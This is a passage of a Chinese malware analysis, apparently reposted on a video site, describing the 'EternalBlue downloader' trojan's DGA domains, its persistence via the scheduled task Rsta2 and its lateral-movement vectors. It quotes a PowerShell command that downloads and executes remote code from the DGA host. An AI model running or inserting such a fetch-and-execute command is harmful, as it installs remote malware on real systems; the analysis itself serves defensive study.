永恒之蓝下载器使用DGA域名进行攻击,多个漏洞攻击内网挖矿(2)

2023-04-30 来源:飞速影视

永恒之蓝下载器使用DGA域名进行攻击,多个漏洞攻击内网挖矿


最后,使用该DGA域名下载后续阶段的Powershell恶意代码执行,并将该行为安装为计划任务Rsta2,实现自动运行。
iex(new-object net.webclient).downloadstring(http://[DGA]/ipco.jsp?0.3)
三、利用多个漏洞攻击内网挖矿
分析发现,当前版本的“永恒之蓝下载器”木马存在以下漏洞攻击行为:
1.利用“永恒之蓝”漏洞攻击

永恒之蓝下载器使用DGA域名进行攻击,多个漏洞攻击内网挖矿


2.针对IPC$弱口令进行爆破攻击

永恒之蓝下载器使用DGA域名进行攻击,多个漏洞攻击内网挖矿


相关影视
合作伙伴
本站仅为学习交流之用,所有视频和图片均来自互联网收集而来,版权归原创者所有,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件(我们会在3个工作日内删除侵权内容,谢谢。)

www.fs94.org-飞速影视 粤ICP备74369512号